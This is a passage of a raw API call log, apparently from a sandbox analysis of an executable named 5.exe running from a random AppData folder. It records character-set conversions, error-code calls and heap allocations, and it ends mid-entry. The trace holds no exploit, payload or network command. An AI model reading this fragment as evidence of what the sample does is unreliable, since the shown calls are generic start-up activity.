\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0088.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18f190, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8aTÀøÈó\x18", lpUsedDefaultChar=0x0) returned 256 [0088.616] GetLastError () returned 0x0 [0088.616] SetLastError (dwErrCode=0x0) [0088.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f290, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0088.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f290, cbMultiByte=256, lpWideCharStr=0x18ebe8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ빨EĀ") returned 256 [0088.616] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ빨EĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0088.616] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ빨EĀ", cchSrc=256, lpDestStr=0x18e9d8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0088.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18f090, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8aTÀøÈó\x18", lpUsedDefaultChar=0x0) returned 256 [0088.617] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x48adf0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe")) returned 0x56 [0088.617] GetLastError () returned 0x0 [0088.617] SetLastError (dwErrCode=0x0) [0088.617] GetLastError () returned 0x0 [0088.617] SetLastError (dwErrCode=0x0) [0088.617] GetLastError () returned 0x0 [0088.617] SetLastError (dwErrCode=0x0) [0088.617] GetLastError () returned 0x0 [0088.617] SetLastError (dwErrCode=0x0) [0088.617] GetLastError () returned 0x0 [0088.617] SetLastError (dwErrCode=0x0) [0088.617] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.618] SetLastError (dwErrCode=0x0) [0088.618] GetLastError () returned 0x0 [0088.619] SetLastError (dwErrCode=0x0) [0088.619] GetLastError () returned 0x0 [0088.619] SetLastError (dwErrCode=0x0) [0088.619] GetLastError () returned 0x0 [0088.619] SetLastError (dwErrCode=0x0) [0088.619] GetLastError () returned 0x0 [0088.619] SetLastError (dwErrCode=0x0) [0088.619] GetLastError () returned 0x0 [0088.619] SetLastError (dwErrCode=0x0) [0088.619] GetLastError () returned 0x0 [0088.620] SetLastError (dwErrCode=0x0) [0088.620] GetLastError () returned 0x0 [0088.620] SetLastError (dwErrCode=0x0) [0088.620] GetLastError () returned 0x0 [0088.620] SetLastError (dwErrCode=0x0) [0088.620] GetLastError () returned 0x0 [0088.620] SetLastError (dwErrCode=0x0) [0088.620] GetLastError () returned 0x0 [0088.620] SetLastError (dwErrCode=0x0) [0088.620] GetLastError () returned 0x0 [0088.620] SetLastError (dwErrCode=0x0) [0088.621] GetLastError () returned 0x0 [0088.621] SetLastError (dwErrCode=0x0) [0088.621] GetLastError () returned 0x0 [0088.621] SetLastError (dwErrCode=0x0) [0088.621] GetLastError () returned 0x0 [0088.621] SetLastError (dwErrCode=0x0) [0088.621] GetLastError () returned 0x0 [0088.621] SetLastError (dwErrCode=0x0) [0088.621] GetLastError () returned 0x0 [0088.622] SetLastError (dwErrCode=0x0) [0088.622] GetLastError () returned 0x0 [0088.622] SetLastError (dwErrCode=0x0) [0088.622] GetLastError () returned 0x0 [0088.622] SetLastError (dwErrCode=0x0) [0088.622] GetLastError () returned 0x0 [0088.622] SetLastError (dwErrCode=0x0) [0088.622] GetLastError () returned 0x0 [0088.622] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.623] SetLastError (dwErrCode=0x0) [0088.623] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.624] GetLastError () returned 0x0 [0088.624] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.625] SetLastError (dwErrCode=0x0) [0088.625] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.626] SetLastError (dwErrCode=0x0) [0088.626] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.627] GetLastError () returned 0x0 [0088.627] SetLastError (dwErrCode=0x0) [0088.628] GetLastError () returned 0x0 [0088.665] SetLastError (dwErrCode=0x0) [0088.665] GetLastError () returned 0x0 [0088.665] SetLastError (dwErrCode=0x0) [0088.665] GetLastError () returned 0x0 [0088.665] SetLastError (dwErrCode=0x0) [0088.665] GetLastError () returned 0x0 [0088.666] SetLastError (dwErrCode=0x0) [0088.666] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x5f) returned 0x1dc1990 [0088.666] GetLastError () returned 0x0 [0088.666] SetLastError (dwErrCode=0x0) [0088.666] GetLastError () returned 0x0 [0088.666] SetLastError (dwErrCode=0x0) [0088.666] GetLastError () returned 0x0 [0088.666] SetLastError (dwErrCode=0x0) [0088.666] GetLastError () returned 0x0 [0088.667] SetLastError (dwErrCode=0x0) [0088.667] GetLastError () returned 0x0 [0088.667] SetLastError (dwErrCode=0x0) [0088.667] GetLastError () returned 0x0 [0088.667] SetLastError (dwErrCode=0x0) [0088.667] GetLastError () returned 0x0 [0088.667] SetLastError (dwErrCode=0x0) [0088.667] GetLastError () returned 0x0 [0088.667] SetLastError (dwErrCode=0x0) [0088.667] GetLastError () returned 0x0 [0088.667] SetLastError (dwErrCode=0x0) [0088.667] GetLastError () returned 0x0 [0088.668] SetLastError (dwErrCode=0x0) [0088.668] GetLastError () returned 0x0 [0088.668] SetLastError (dwErrCode=0x0) [0088.668] GetLastError () returned 0x0 [0088.668] SetLastError (dwErrCode=0x0) [0088.668] GetLastError () returned 0x0 [0088.668] SetLastError (dwErrCode=0x0) [0088.668] GetLastError () returned 0x0 [0088.668] SetLastError (dwErrCode=0x0) [0088.668] GetLastError () returned 0x0 [0088.668] SetLastError (dwErrCode=0x0) [0088.668] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.669] GetLastError () returned 0x0 [0088.669] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.670] SetLastError (dwErrCode=0x0) [0088.670] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.671] SetLastError (dwErrCode=0x0) [0088.671] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.672] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.672] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.672] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.672] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.672] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.672] GetLastError () returned 0x0 [0088.672] SetLastError (dwErrCode=0x0) [0088.673] GetLastError () returned 0x0 [0088.673] SetLastError (dwErrCode=0x0) [0088.673] GetLastError () returned 0x0 [0088.673] SetLastError (dwErrCode=0x0) [0088.673] GetLastError () returned 0x0 [0088.673] SetLastError (dwErrCode=0x0) [0088.673] GetLastError () returned 0x0 [0088.673] SetLastError (dwErrCode=0x0) [0088.673] GetLastError () returned 0x0 [0088.673] SetLastError (dwErrCode=0x0) [0088.674] GetLastError () returned 0x0 [0088.674] SetLastError (dwErrCode=0x0) [0088.674] GetLastError () returned 0x0 [0088.674] SetLastError (dwErrCode=0x0) [0088.674] GetLastError () returned 0x0 [0088.674] SetLastError (dwErrCode=0x0) [0088.674] GetLastError () returned 0x0 [0088.674] SetLastError (dwErrCode=0x0) [0088.674] GetLastError () returned 0x0 [0088.674] SetLastError (dwErrCode=0x0) [0088.674] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.675] GetLastError () returned 0x0 [0088.675] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.676] SetLastError (dwErrCode=0x0) [0088.676] GetLastError () returned 0x0 [0088.677] SetLastError (dwErrCode=0x0) [0088.677] GetLastError () returned 0x0 [0088.677] SetLastError (dwErrCode=0x0) [0088.677] GetLastError () returned 0x0 [0088.677] SetLastError (dwErrCode=0x0) [0088.677] GetLastError () returned 0x0 [0088.677] SetLastError (dwErrCode=0x0) [0088.677] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.678] SetLastError (dwErrCode=0x0) [0088.678] GetLastError () returned 0x0 [0088.679] SetLastError (dwErrCode=0x0) [0088.679] GetLastError () returned 0x0 [0088.679] SetLastError (dwErrCode=0x0) [0088.679] GetLastError () returned 0x0 [0088.679] SetLastError (dwErrCode=0x0) [0088.679] GetLastError () returned 0x0 [0088.679] SetLastError (dwErrCode=0x0) [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x98) returned 0x1dc19f8 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x1f) returned 0x1dc1a98 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x36) returned 0x1dc1ac0 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x37) returned 0x1dc1b00 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x3c) returned 0x1dc1b40 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x31) returned 0x1dc1b88 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x17) returned 0x1dc1bc8 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x24) returned 0x1dc1be8 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x14) returned 0x1dc1c18 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0xd) returned 0x1dc1c38 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x25) returned 0x1dc1c50 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x39) returned 0x1dc1c80 [0088.679] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x18) returned 0x1dc1cc8 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x17) returned 0x1dc1ce8 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0xe) returned 0x1dc1d08 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x69) returned 0x1dc1d20 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x3e) returned 0x1dc1d98 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x1b) returned 0x1dc1de0 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x1d) returned 0x1dc1e08 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x48) returned 0x1dc1e30 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x12) returned 0x1dc1e80 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x18) returned 0x1dc1ea0 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x1b) returned 0x1dc1ec0 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x24) returned 0x1dc1ee8 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x29) returned 0x1dc1f18 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x1e) returned 0x1dc1f50 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x41) returned 0x1dc1f78 [0088.680] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x17) returned 0x1dc1fc8 [0088.680] RtlAllocateHeap 